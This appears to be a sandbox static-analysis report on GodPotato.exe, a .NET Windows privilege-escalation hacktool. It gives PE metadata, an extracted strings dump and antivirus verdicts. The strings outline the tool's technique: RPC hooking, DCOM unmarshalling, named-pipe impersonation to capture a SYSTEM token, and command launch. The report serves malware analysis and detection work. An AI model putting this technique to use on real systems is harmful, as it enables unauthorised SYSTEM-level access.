Static | ZeroBOX

PE Compile Time

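2086-03-09 09:18:23 (value as stored in the PE header; the date lies in the future and the embedded version strings say "Copyright 2022", so treat it as forged or as a hash-derived value from a deterministic build, not as a real build time)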

PE Imphash

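f34d5f2d4577ed6d9ceec516c1f5a744 (computed from the import table, which here holds only mscoree.dll!_CorExeMain — see Imports; .NET executables with that same single import produce the same imphash, so it is not a sample-specific indicator)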

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x0000d4b0 0x0000d600 5.90096389586
.rsrc 0x00010000 0x000005ac 0x00000600 4.07122441258
.reloc 0x00012000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x00010090 0x0000031c LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x000103bc 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
MEOW.
MEOWo
v2.0.50727
#Strings
t%j%T%G%:%
%`%-%
delegateFun10
<>c__DisplayClass42_0
<PipeServer>b__0
delegateFun11
List`1
Reserved1
delegateFun12
advapi32
Kernel32
kernel32
ReadUInt32
ReadInt32
WriteInt32
Dictionary`2
cbReserved2
lpReserved2
delegateFun13
Reserved3
delegateFun14
ReadUInt64
WriteInt64
ToInt64
EPM_PROTOCOL_OSI_TP4
Reserved4
delegateFun4
Reserved5
delegateFun5
ReadUInt16
ReadInt16
WriteInt16
Reserved6
delegateFun6
Reserved7
delegateFun7
Reserved8
delegateFun8
delegateFun9
<Module>
SECURITY_LOGON_SESSION_DATA
EPM_PROTOCOL_SMB
CREATE_BREAKAWAY_FROM_JOB
EPM_PROTOCOL_VINES_IPC
EPM_PROTOCOL_NCALRPC
NewOrcbRPC
newOrcbRPC
HookRPC
GENERIC_READ
STGM_READ
STGM_SHARE_DENY_READ
CREATE_SUSPENDED
SE_PRIVILEGE_ENABLED
STANDARD_RIGHTS_REQUIRED
SE_PRIVILEGE_REMOVED
MAXIMUM_ALLOWED
TOKEN_ADJUST_SESSIONID
STARTF_TITLEISAPPID
get_SID
set_SID
SyntaxGUID
EPM_PROTOCOL_UUID
TowerID
towerID
ProcessID
PROCESS_MODE_BACKGROUND_END
PIPE_ACCESS_INBOUND
PIPE_ACCESS_OUTBOUND
E_NOINTERFACE
RPC_SERVER_INTERFACE
STARTF_UNTRUSTEDSOURCE
TOKEN_QUERY_SOURCE
CREATE_DEFAULT_ERROR_MODE
PIPE_READMODE_MESSAGE
PIPE_TYPE_MESSAGE
RPC_DISPATCH_TABLE
PHANDLE
BAD_HANLE
CREATE_NEW_CONSOLE
STARTF_TITLEISLINKNAME
STGM_SHARE_DENY_NONE
EPM_PROTOCOL_NAMED_PIPE
TOKEN_TYPE
SECURITY_LOGON_TYPE
TOKEN_ELEVATION_TYPE
STGM_FAILIFTHERE
HANDLE_FLAG_PROTECT_FROM_CLOSE
TOKEN_DUPLICATE
STGM_CREATE
TOKEN_IMPERSONATE
STGM_READWRITE
GENERIC_WRITE
STGM_WRITE
STGM_SHARE_DENY_WRITE
STARTF_USEFILLATTRIBUTE
GENERIC_EXECUTE
PIPE_READMODE_BYTE
PIPE_TYPE_BYTE
STGM_SHARE_EXCLUSIVE
STARTF_USESIZE
EPM_PROTOCOL_NCADG
STARTF_PREVENTPINNING
GENERIC_MAPPING
UNICODE_STRING
STATSTG
STATUS_INFO_LENGTH_MISMATCH
GodPotato.NativeAPI
EPM_PROTOCOL_NETBEUI
STARTF_FORCEOFFFEEDBACK
STARTF_FORCEONFEEDBACK
EPM_PROTOCOL_APPLETALK
EPM_PROTOCOL_STREETTALK
TOKEN_MANDATORY_LABEL
PROFILE_KERNEL
CREATE_PRESERVE_CODE_AUTHZ_LEVEL
GENERIC_ALL
EPM_PROTOCOL_NULL
ProcessUserModeIOPL
CREATE_SHARED_WOW_VDM
CREATE_SEPARATE_WOW_VDM
UnmarshalDCOM
EPM_PROTOCOL_NCACN
STARTF_RUNFULLSCREEN
PROCESS_ACCESS_TOKEN
PROCESS_MODE_BACKGROUND_BEGIN
RPC_VERSION
OBJECT_TYPE_INFORMATION
PROCESS_INFORMATION
TOKEN_ELEVATION
STARTF_USEPOSITION
STARTUPINFO
MIDL_SERVER_INFO
System.IO
EPM_PROTOCOL_TCP
EPM_PROTOCOL_DDP
EPM_PROTOCOL_UDP
EPM_PROTOCOL_IP
EPM_PROTOCOL_VINES_SPP
EPM_PROTOCOL_DSP
EPM_PROTOCOL_DNET_NSP
EPM_PROTOCOL_HTTP
CREATE_NEW_PROCESS_GROUP
TOKEN_ALL_ACCESS_P
RPC_SYNTAX_IDENTIFIER
PROFILE_USER
NMPWAIT_WAIT_FOREVER
PROFILE_SERVER
NOERROR
IIDPTR
TOKEN_STATISTICS
EPM_PROTOCOL_UNIX_DS
PIPE_UNLIMITED_INSTANCES
TOKEN_ADJUST_PRIVILEGES
STARTF_USESTDHANDLES
SID_AND_ATTRIBUTES
SECURITY_ATTRIBUTES
EPM_PROTOCOL_OSI_CLNS
CREATE_FORCEDOS
EPM_PROTOCOL_NETBIOS
TOKEN_GROUPS
TOKEN_ADJUST_GROUPS
STARTF_USECOUNTCHARS
TOKEN_INFORMATION_CLASS
PROCESS_INFORMATION_CLASS
OBJECT_INFORMATION_CLASS
IDLE_PRIORITY_CLASS
REALTIME_PRIORITY_CLASS
HIGH_PRIORITY_CLASS
ABOVE_NORMAL_PRIORITY_CLASS
BELOW_NORMAL_PRIORITY_CLASS
DUPLICATE_SAME_ACCESS
ERROR_SUCCESS
STATUS_SUCCESS
DETACHED_PROCESS
CREATE_PROTECTED_PROCESS
DEBUG_PROCESS
DEBUG_ONLY_THIS_PROCESS
PIPE_REJECT_REMOTE_CLIENTS
PIPE_ACCEPT_REMOTE_CLIENTS
ALPHA_BET
PIPE_NOWAIT
NMPWAIT_NOWAIT
PIPE_WAIT
NMPWAIT_USE_DEFAULT_WAIT
HANDLE_FLAG_INHERIT
CREATE_IGNORE_SYSTEM_DEFAULT
TOKEN_ADJUST_DEFAULT
SE_PRIVILEGE_ENABLED_BY_DEFAULT
CREATE_UNICODE_ENVIRONMENT
EXTENDED_STARTUPINFO_PRESENT
STGM_CONVERT
STARTF_USESHOWWINDOW
CREATE_NO_WINDOW
STATUS_BUFFER_OVERFLOW
CreateFileW
CreateNamedPipeW
CreateProcessWithTokenW
CreateProcessAsUserW
CreateProcessW
PIPE_ACCESS_DUPLEX
_SYSTEM_HANDLE_INFORMATION_EX
SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX
EPM_PROTOCOL_NB_IPX
EPM_PROTOCOL_IPX
EPM_PROTOCOL_SPX
STARTF_USEHOTKEY
TOKEN_ASSIGN_PRIMARY
TOKEN_QUERY
INHERIT_PARENT_AFFINITY
INHERIT_CALLER_PRIORITY
value__
ppLogonSessionData
LsaGetLogonSessionData
SetQuota
mscorlib
System.Collections.Generic
authzSnc
pStubDesc
AuthnSvc
authnSvc
AuthzSvc
get_Id
dwThreadId
ModifiedId
InterfaceId
TokenId
LogonId
sourceSessionId
WTSGetActiveConsoleSessionId
TokenSessionId
targetSessionId
sessionId
AuthenticationId
get_TargetProcessId
set_TargetProcessId
dwProcessId
processId
pcbRead
GenericRead
bytesRead
VirtualMemoryRead
CreateThread
hThread
pipeServerThread
DynamicCharged
TokenVirtualizationEnabled
overlapped
get_Required
set_Required
IsTokenRestricted
get_IsRestricted
set_IsRestricted
TokenIsRestricted
TokenElevationTypeLimited
Untrusted
lpReserved
reserved
TokenVirtualizationAllowed
TokenIsSandboxed
targetProcessPid
targetPid
TokenLogonSid
TokenAppContainerSid
orcbRPCGuid
NewGuid
lpLuid
<SID>k__BackingField
<TargetProcessId>k__BackingField
<Required>k__BackingField
<IsRestricted>k__BackingField
<cmd>k__BackingField
<TokenHandle>k__BackingField
<CombaseModule>k__BackingField
<FieldName>k__BackingField
<PipeName>k__BackingField
<UserName>k__BackingField
<TokenType>k__BackingField
<LogonType>k__BackingField
<AuthenticationType>k__BackingField
<TokenElevationType>k__BackingField
<IsClose>k__BackingField
<DefaultValue>k__BackingField
<TargetProcessExePath>k__BackingField
<IsHook>k__BackingField
<ImpersonationLevel>k__BackingField
<IntegrityLevel>k__BackingField
<TargetProcessToken>k__BackingField
<LogonDomain>k__BackingField
<Session>k__BackingField
<Description>k__BackingField
<ConsoleWriter>k__BackingField
<DispatchTablePtr>k__BackingField
<UseProtseqFunctionPtr>k__BackingField
<Groups>k__BackingField
<TokenUIAccess>k__BackingField
<UseProtseqFunctionParamCount>k__BackingField
<IsStart>k__BackingField
get_cmd
set_cmd
set_IsBackground
NativeMethod
GetMethod
method
Standard
password
CoUnmarshalInterface
Replace
TokenPrivateNameSpace
Service
CreateInstance
TokenSessionReference
IdentityReference
ComputeOccurence
TokenSource
dwErrCode
FileMode
pipeMode
dwShareMode
openMode
ProcessDefaultHardErrorMode
get_Unicode
AuthenticationPackage
NonPagedPoolUsage
get_Message
BytesLeftThisMessage
EndInvoke
BeginInvoke
DispatchTable
dispatchTable
ThunkTable
fmtStringOffsetTable
DynamicAvailable
IDisposable
hSourceHandle
moduleHandle
RuntimeTypeHandle
CloseHandle
DuplicateHandle
ListSystemHandle
GetTypeFromHandle
get_TokenHandle
set_TokenHandle
tokenHandle
hSourceProcessHandle
hTargetProcessHandle
targetProcessHandle
processHandle
lpTargetHandle
bInheritHandle
handle
hTemplateFile
tokenHanle
Console
lpTitle
get_CombaseModule
set_CombaseModule
ProcessModule
get_Name
get_FieldName
set_FieldName
lpFileName
get_ModuleName
get_PipeName
set_PipeName
pipeName
baseName
PrincipalName
principalName
lpSystemName
lpApplicationName
lpName
appName
get_UserName
set_UserName
privName
GetDisplayName
LogonTime
ExpirationTime
lpCommandLine
commandLine
WriteLine
hReadPipe
CreateNamedPipe
hNamedPipe
PeekNamedPipe
ConnectNamedPipe
CreatePipe
hWritePipe
GetNestedType
ValueType
dwLockType
PoolType
get_TokenType
set_TokenType
GetTokenType
getTokenType
tokenType
get_LogonType
set_LogonType
UndefinedLogonType
logonType
get_AuthenticationType
set_AuthenticationType
GetAuthenticationType
get_TokenElevationType
set_TokenElevationType
GetTokenElevationType
ObjectType
GetElementType
get_PropertyType
FileShare
Restore
Signature
PtrToStructure
MethodBase
ReadOnlyCollectionBase
MaintainHandleDatabase
get_IsClose
set_IsClose
Dispose
ArgsParse
CreateDelegate
useProtseqDelegate
GetFunctionPointerForDelegate
MulticastDelegate
Translate
Terminate
PreviousState
NewState
GenericWrite
VirtualMemoryWrite
CompilerGeneratedAttribute
GuidAttribute
AttributeUsageAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
dwFillAttribute
GetCustomAttribute
AssemblyFileVersionAttribute
SecurityPermissionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
FlagsAttribute
ArgsAttribute
CompilationRelaxationsAttribute
ReliabilityContractAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
GenericExecute
ReadByte
WriteByte
get_Value
LookupPrivilegeValue
HandleValue
TryGetValue
ParseArgsSetValue
get_DefaultValue
set_DefaultValue
get_IsAlive
CachedInteractive
CachedRemoteInteractive
get_IsPrimitive
dlibMove
Remove
GodPotato.exe
dwXSize
dwYSize
get_Size
cbSize
TypeSize
inBufferSize
outBufferSize
SecurityDescriptorSize
ProcessLdtSize
SetSize
get_ModuleMemorySize
Initialize
Synchronize
SizeOf
StandardObjRef
standardObjRef
objref
RevertToSelf
System.Threading
StringBinding
stringBinding
SecurityBinding
securityBinding
binding
Encoding
GenericMapping
FromBase64String
ProcString
procString
ToString
Substring
statStg
Search
ProcessWorkingSetWatch
get_TargetProcessExePath
set_TargetProcessExePath
get_Length
MaximumLength
SystemInformationLength
TokenInformationLength
ProcessInformationLength
ObjectInformationLength
ReturnLength
BufferLength
dwLength
StartsWith
PtrToStringUni
StringToHGlobalUni
AsyncCallback
ListProcessTokensCallback
listProcessTokensCallback
ListProcessTokensDefaultCallback
callback
pBlock
CachedUnlock
get_IsHook
set_IsHook
Network
dwMask
ProcessAffinityMask
AllocHGlobal
FreeHGlobal
Marshal
DuplicateTokenExInternal
System.Security.Principal
TokenDefaultDacl
System.ComponentModel
get_ImpersonationLevel
set_ImpersonationLevel
TokenImpersonationLevel
GetImpersonationLevel
impersonationLevel
TokenProcessTrustLevel
get_IntegrityLevel
set_IntegrityLevel
GetTokenIntegrityLevel
bytesAvail
GenericAll
ole32.dll
wtsapi32.dll
Advapi32.dll
advapi32.dll
kernel32.dll
secur32.dll
psapi.dll
ntdll.dll
TokenElevationTypeFull
TowerProtocol
towerProtocol
IStreamImpl
IStream
FileStream
get_BaseStream
MemoryStream
m_stream
Program
get_Item
set_Item
System
Custom
get_IsEnum
Boolean
get_Token
TokenLinkedToken
hExistingToken
hToken
isFindSystemToken
SharpToken
ProcessAccessToken
OpenProcessToken
get_TargetProcessToken
set_TargetProcessToken
targetProcessToken
processToken
GetToken
PutToken
ContextToken
phNewToken
pcbWritten
get_LogonDomain
set_LogonDomain
logonDomain
SeekOrigin
TokenOrigin
dwOrigin
LockRegion
UnlockRegion
StringSDRevision
MajorVersion
MinorVersion
SyntaxVersion
get_Session
set_Session
WTSConnectSession
TokenBnoIsolation
ProcessWx86Information
ProcessBasicInformation
ObjectBasicInformation
QueryLimitedInformation
SystemExtendedHandleInformation
ObjectHandleInformation
SetHandleInformation
ObjectNameInformation
ObjectTypeInformation
NtQuerySystemInformation
GetTokenInformation
ObjectAllTypesInformation
TokenAccessInformation
lpProcessInformation
processInformation
ObjectInformation
ProcessLdtInformation
SetInformation
QueryInformation
TokenImpersonation
VirtualMemoryOperation
TokenElevation
SecurityAction
System.Reflection
ProcessModuleCollection
get_Position
plibNewPosition
dwCreationDisposition
Win32Exception
InvalidDataException
NotImplementedException
get_InnerException
ArgumentException
get_Description
set_Description
System.Runtime.ConstrainedExecution
pattern
UnKnown
IID_IUnknown
pIUnknown
CopyTo
MethodInfo
lpStartupInfo
MemberInfo
InterpreterInfo
ConstructorInfo
pSyntaxInfo
PropertyInfo
propertyInfo
startupinfo
GodPotato
PrintHelp
lpDesktop
TokenPrimaryGroup
ProcessEnableAlignmentFaultFixup
ReadChar
TokenAppContainerNumber
BinaryReader
StringBuilder
LsaFreeReturnBuffer
buffer
GodPotatoUnmarshalTrigger
SecurityIdentifier
IMoniker
CreateObjrefMoniker
ppMoniker
moniker
Handler
TokenIsLessPrivilegedAppContainer
TokenIsAppContainer
TokenOwner
ImpersonateLoggedOnUser
TokenUser
GetUser
get_ConsoleWriter
set_ConsoleWriter
consoleWriter
StringWriter
TextWriter
BinaryWriter
ObjectPointer
PipeServer
ToLower
GetLastWin32Error
hStdError
SetLastError
IEnumerator
GetEnumerator
.cctor
GetConstructor
StringSecurityDescriptor
ConvertStringSecurityDescriptorToSecurityDescriptor
pSecurityDescriptor
get_DispatchTablePtr
set_DispatchTablePtr
get_UseProtseqFunctionPtr
set_UseProtseqFunctionPtr
StructureToPtr
handleInfoPtr
ReadIntPtr
WriteIntPtr
TokenStatistics
System.Diagnostics
TokenRestrictedSids
NativeMethods
System.Runtime.InteropServices
System.Runtime.CompilerServices
maxInstances
DebuggingModes
TokenGroupsAndPrivileges
DisableAllPrivileges
AdjustTokenPrivileges
NumEntries
TokenCapabilities
GetProperties
GetNumberOfHandles
bInheritHandles
examples
get_Modules
ProcessTimes
System.Runtime.InteropServices.ComTypes
lpThreadAttributes
InvalidAttributes
dwFlagsAndAttributes
HandleAttributes
lpPipeAttributes
TokenRestrictedDeviceClaimAttributes
TokenDeviceClaimAttributes
TokenRestrictedUserClaimAttributes
TokenUserClaimAttributes
lpTokenAttributes
TokenSingletonAttributes
lpProcessAttributes
TokenSecurityAttributes
securityAttributes
ReadBytes
objRefBytes
GetBytes
GetValues
PublicRefs
publicRefs
ProcessCreateFlags
grfFlags
BindingFlags
dwLogonFlags
dwCreationFlags
ProcessAccessFlags
TokenChildProcessFlags
grfCommitFlags
dwFlags
ppdsaNewBindings
ParseArgs
GodPotatoArgs
<>4__this
NewCredentials
TokenuUils
ListProcessTokens
Contains
System.Security.Permissions
System.Collections
TokenHasRestrictions
dwOptions
getGoups
get_Groups
set_Groups
TokenRestrictedDeviceGroups
TokenDeviceGroups
TokenGroups
get_Chars
GetChars
dwXCountChars
dwYCountChars
ProcessIoPortHandlers
ProcessVmCounters
ProcessIoCounters
secAttrs
SystemInformationClass
TokenInformationClass
tokenInformationClass
ProcessInformationClass
ObjectInformationClass
MaxTokenInfoClass
MaxProcessInfoClass
ProcessPriorityClass
get_TokenUIAccess
set_TokenUIAccess
GetTokenUIAccess
dwDesiredAccess
GrantedAccess
ValidAccess
FileAccess
processAccess
ProtectedProcess
NtSuspendProcess
NtResumeProcess
CreateProcess
NtTerminateProcess
hProcess
OpenProcess
NtSetInformationProcess
GetCurrentProcess
get_BaseAddress
NetworkAddress
networkAddress
AttributeTargets
ProcessQuotaLimits
ProcessPooledUsageAndLimits
ExitStatus
HandleAt
Concat
Format
fakeObject
NtDuplicateObject
hObject
UnmarshalObject
ToObject
GetIUnknownForObject
NtQueryObject
object
oldProtect
VirtualProtect
newProtect
libOffset
FmtStringOffset
SecurityOffset
Commit
get_Default
TokenElevationTypeDefault
IAsyncResult
result
ImpersonateNamedPipeClient
lpEnvironment
Component
get_Current
GetCurrent
RpcProtseqEndpoint
get_Count
PrivilegeCount
DispatchTableCount
PeakHandleCount
ProcessHandleCount
get_UseProtseqFunctionParamCount
set_UseProtseqFunctionParamCount
nCount
GroupCount
PeakObjectCount
RpcProtseqEndpointCount
GetSidSubAuthorityCount
NTAccount
Interrupt
HighPart
LowPart
ThreadStart
get_IsStart
set_IsStart
TokenSandBoxInert
Revert
Convert
ProcessDebugPort
ProcessExceptionPort
ProcessPriorityBoost
get_Out
createProcessReadOut
defaultTimeout
hStdInput
hStdOutput
MoveNext
System.Text
GodPotatoContext
godPotatoContext
InitContext
NetworkCleartext
tryAddTokenPriv
DefaultManagerEpv
wShowWindow
GetModuleFileNameEx
RevertToSelfEx
DuplicateTokenEx
pTransferSyntax
CreatorBackTrackIndex
IBindCtx
CreateBindCtx
bindCtx
Sunday
ToByteArray
DualStringArray
dualStringArray
ToArray
get_IsArray
TokenAuditPolicy
TokenMandatoryPolicy
Consistency
TokenPrimary
lpCurrentDirectory
get_Capacity
op_Equality
op_Inequality
MediumHighIntegrity
SystemIntegrity
MediumIntegrity
LowIntegrity
GetSidSubAuthority
nSubAuthority
ProcessBasePriority
ProcessRaisePriority
ppdsaNewSecurity
systemIdentity
WindowsIdentity
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
WrapNonExceptionThrows
GodPotato
Copyright
2022
$2ae886c3-3272-40be-8d3c-ebaede9e61e1
1.0.0.0
Inherited
AllowMultiple
cmd /c whoami
Description
CommandLineT
Required
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
+, -!.!/!0!1!2!3!4!5!6!7!8%9%:%;%<%=%>'?'@'A'B'
UnKnown
[*] process start with pid {0}
[!] Cannot create process Win32Error:{0}
Required Parameter
Arguments:
-{0} Required:{1} {2} (default {3})
Example:
-{0} "{1}"
-{0} {1}
FFFFF FFF FFFFFFF
FFFFFFF FFF FFFFFFFF
FFF FFFF FFF FFF FFF FFF FFF
FFF FFF FFF FFF FFF FFF FFF
FFF FFF FFF FFF FFF FFF FFF
FFFF FFFFFFF FFFFFFFF FFF FFF FFFFFFF FFFFFFFFF FFFFFF FFFFFFFFF FFFFFF
FFFF FFFF FFFF FFF FFFF FFF FFFF FFFF FFFF FFF FFF FFF FFF FFF FFFF
FFFF FFFFF FFF FFF FFF FFF FFFFFFFF FFF FFF FFF F FFF FFF FFF FFF
FFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFF FFF FFF FFFF
FFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFFFFF FFF FFF FFFF
FFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFFF FFF FFF FFF FFFF
FFFF FFFF FFFF FFF FFFF FFF FFF FFF FFFF FFF FFFF FFF FFF FFFF FFF
FFFFFFFF FFFFFFF FFFFFFFF FFF FFFFFFF FFFFFF FFFFFFFF FFFFFFF FFFFFFF
FFFFFFF FFFFF FFFFFFF FFF FFFFF FFFFF FFFFFFFF FFFF FFFF
GodPotato
Exception:
[*] CombaseModule: 0x{0:x}
[*] DispatchTable: 0x{0:x}
[*] UseProtseqFunction: 0x{0:x}
[*] UseProtseqFunctionParamCount: {0}
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] UnmarshalObject: 0x{0:x}
[*] CurrentUser:
[!] Failed to impersonate security context token
No combase module found
Cannot find IDL structure
delegateFun
combase.dll
D:(A;OICI;GA;;;WD)
\\.\pipe\
\pipe\epmapper
[*] CreateNamedPipe
[*] Pipe Connected!
[*] CurrentsImpersonationLevel:
[*] Start Search System Token
[*] Find System Token :
[!] ImpersonateNamedPipeClient fail error:{0}
[!] ConnectNamedPipe timeout
[!] CreateNamedPipe fail error:{0}
IsHook == false
IsStart == false
18f70770-8e64-11cf-9af1-0020af6e72f4
ncacn_np:localhost/pipe/
[\pipe\epmapper]
ncacn_ip_tcp:fuck you !
GodPotatoContext was not initialized
objref:
[*] DCOM obj GUID: {0}
[*] DCOM obj IPID: {0}
[*] DCOM obj OXID: 0x{0:x}
[*] DCOM obj OID: 0x{0:x}
[*] DCOM obj Flags: 0x{0:x}
[*] DCOM obj PublicRefs: 0x{0:x}
[*] Marshal Object bytes len: {0}
[*] UnMarshal Object
{00000000-0000-0000-C000-000000000046}
127.0.0.1
Does not look like an OBJREF stream
NT AUTHORITY\SYSTEM
[*] PID : {0} Token:0x{1:x} User: {2} ImpersonationLevel: {3}
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
GodPotato
FileVersion
1.0.0.0
InternalName
GodPotato.exe
LegalCopyright
Copyright
2022
LegalTrademarks
OriginalFilename
GodPotato.exe
ProductName
GodPotato
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
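Antivirus Signature (one engine per line, followed by its verdict; family labels vary by vendor — several engines report JuicyPotato/JPotato, while the sample's own embedded strings name it GodPotato)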
Bkav W32.AIDetectMalware.CS
Lionic Hacktool.Win32.JuicyPotato.3!c
tehtris Clean
ClamAV Win.Tool.Msilheracles-10019688-0
CMC Clean
CAT-QuickHeal Clean
Skyhigh RDN/Generic PUP.z
ALYac Gen:Variant.Jalapeno.4052
Cylance Unsafe
Zillya Tool.JPotato.Win32.45
Sangfor Hacktool.Msil.Juicypotato.Vxx3
K7AntiVirus Hacktool ( 005a3a9b1 )
Alibaba VirTool:MSIL/Gopotesez.7cd90386
K7GW Hacktool ( 005a3a9b1 )
Cybereason malicious.14c98b
huorong Clean
Baidu Clean
VirIT Trojan.Win32.MSIL_Heur.A
Paloalto generic.ml
Symantec Hacktool
Elastic Windows.Hacktool.GodPotato
ESET-NOD32 a variant of MSIL/HackTool.JuicyPotato.F
APEX Malicious
Avast Win32:HacktoolX-gen [Trj]
Cynet Clean
Kaspersky HEUR:HackTool.MSIL.JPotato.gen
BitDefender Gen:Variant.Jalapeno.4052
NANO-Antivirus Trojan.Win32.JPotato.jwghkp
ViRobot Trojan.Win.S.MSIL.57344
MicroWorld-eScan Gen:Variant.Jalapeno.4052
Tencent Hacktool.Misl.Potato.16001201
TACHYON Clean
Sophos ATK/GPotato-A
F-Secure Heuristic.HEUR/AGEN.1365242
DrWeb Clean
VIPRE Gen:Variant.Jalapeno.4052
TrendMicro HackTool.MSIL.GODPOTATO.A
McAfeeD Real Protect-LS!5F3DD0514C98
Trapmine Clean
FireEye Gen:Variant.Jalapeno.4052
Emsisoft Gen:Variant.Jalapeno.4052 (B)
Ikarus Trojan.MSIL.HackTool
GData Gen:Variant.Jalapeno.4052
Jiangmin HackTool.MSIL.bchk
Webroot W32.Malware.Gen
Varist W32/MSIL_Agent.FQC.gen!Eldorado
Avira HEUR/AGEN.1365242
Antiy-AVL HackTool/MSIL.JuicyPotato
Kingsoft MSIL.HackTool.JPotato.gen
Gridinsoft Clean
Xcitium Malware@#2qu1fdylijz2m
Arcabit Trojan.Jalapeno.DFD4
SUPERAntiSpyware Clean
ZoneAlarm HEUR:HackTool.MSIL.JPotato.gen
Microsoft VirTool:MSIL/Gopotesez.A
Google Detected
AhnLab-V3 Trojan/Win.MSILMamut.C5410538
Acronis Clean
McAfee RDN/Generic PUP.z
MAX malware (ai score=100)
VBA32 Clean
Malwarebytes Generic.Malware.AI.DDS
Panda PUP/Hacktool
Zoner Clean
TrendMicro-HouseCall HackTool.MSIL.GODPOTATO.A
Rising HackTool.JuicyPotato!8.10699 (CLOUD)
Yandex Riskware.JuicyPotato!ZH7/wIA6OIs
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.206061730.susgen
Fortinet MSIL/JuicyPotato.F!tr
BitDefenderTheta Clean
AVG Win32:HacktoolX-gen [Trj]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud Hacktool:Win/GodPotato.A
No IRMA results available.